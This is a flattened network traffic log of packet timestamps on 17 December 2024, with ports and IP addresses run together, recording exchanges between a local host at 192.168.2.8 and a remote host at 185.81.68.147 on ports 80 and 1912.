                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.812330008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.812383890 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.813076973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.863502979 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.912595987 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.912749052 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.912774086 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.912808895 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.912822962 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.912852049 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.913108110 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.913120031 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.913150072 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.913167953 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.913235903 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.913280964 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.913352966 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.913399935 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.913496971 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.913546085 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.913705111 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.913748026 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.913876057 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.913927078 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.914115906 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.914161921 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.914233923 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.914285898 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.914326906 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.914372921 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.955358982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.955442905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.955598116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.955769062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.955881119 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.955960035 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.956722975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.956875086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.956948042 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.957685947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.957818985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.957936049 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.958657026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.958794117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.958884001 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.959582090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.959636927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.959716082 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.960540056 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.960643053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.960760117 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.961523056 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.961576939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.961623907 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.962426901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.962546110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.962738037 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.963449001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.963546038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.963619947 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.964319944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.964443922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.964724064 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.965274096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.965473890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.965739965 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.966289043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.966356993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.966459036 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.967190027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.967344046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.967434883 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.968142033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.968305111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.968349934 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.969093084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.969218969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.969306946 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.970092058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.970140934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.970304966 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.970973015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.971071005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.971282959 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.971962929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.972104073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.972167015 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.972915888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.973051071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.973145962 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.973882914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.973970890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.974030018 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.974842072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.974967003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.975157976 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.975753069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.975873947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.975960016 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.976710081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.976824999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.976933956 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.977657080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.977777004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.977835894 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.978599072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.978622913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.978713036 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.979512930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.979660988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.979738951 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.980487108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.980529070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.980609894 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.981429100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.981518030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.981561899 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.982384920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.982453108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.982501030 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.983345985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.983453989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.983844042 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.984296083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.984402895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.984493017 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.985245943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.985407114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.985492945 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.986160994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.986279964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.986433983 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.987138033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.987260103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.987325907 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.988142014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.988219023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.988287926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.989088058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.989226103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.989311934 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.989998102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.990196943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.990345001 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.990950108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.991090059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.991162062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.991970062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.992002010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.992063046 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.992947102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.993043900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.993220091 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.994018078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.994149923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.994220018 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.994849920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.994903088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.995049953 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.995740891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.995860100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.996059895 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.996670008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.996857882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.996973991 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.997605085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.997760057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.997840881 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.998610973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.998732090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.998822927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.999536037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.999648094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.999699116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.000484943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.000623941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.000811100 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.001456022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.001627922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.001698017 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.002454996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.002510071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.002624989 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.003408909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.003547907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.003633976 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.004327059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.004618883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.004668951 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.005211115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.034555912 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.034621954 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.034641027 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.034679890 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.034693956 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.034739017 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.035094976 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.035145998 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.035193920 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.035240889 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.036443949 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.036510944 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.036530972 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.036559105 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.036915064 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.036969900 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.037019014 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.037064075 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.038002014 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.038053036 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.038055897 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.038098097 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.038604975 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.038661957 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.038662910 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.038676977 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.038691044 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.038728952 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.038795948 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.039836884 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.039849997 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.039880991 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.039894104 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.039896011 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.039906979 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.039933920 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.039947987 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.040436983 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.040451050 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.040463924 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.040494919 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.040514946 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.040548086 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.040569067 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.040587902 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.041521072 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.041567087 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.041654110 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.041663885 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.041703939 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.051151037 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.147456884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.147511959 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.147636890 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.147768974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.147977114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.148260117 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.148709059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.148812056 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.149050951 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.149672985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.149797916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.150016069 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.150604010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.150707960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.151655912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.151691914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.151833057 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.151833057 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.152544975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.152715921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.152957916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.153476954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.153625965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.154067993 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.154309988 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.154445887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.154472113 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.154499054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.154517889 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.154572964 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.154580116 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.154582977 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.154603958 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.154633045 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.154687881 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.154746056 CET191249710185.81.68.147192.168.2.8
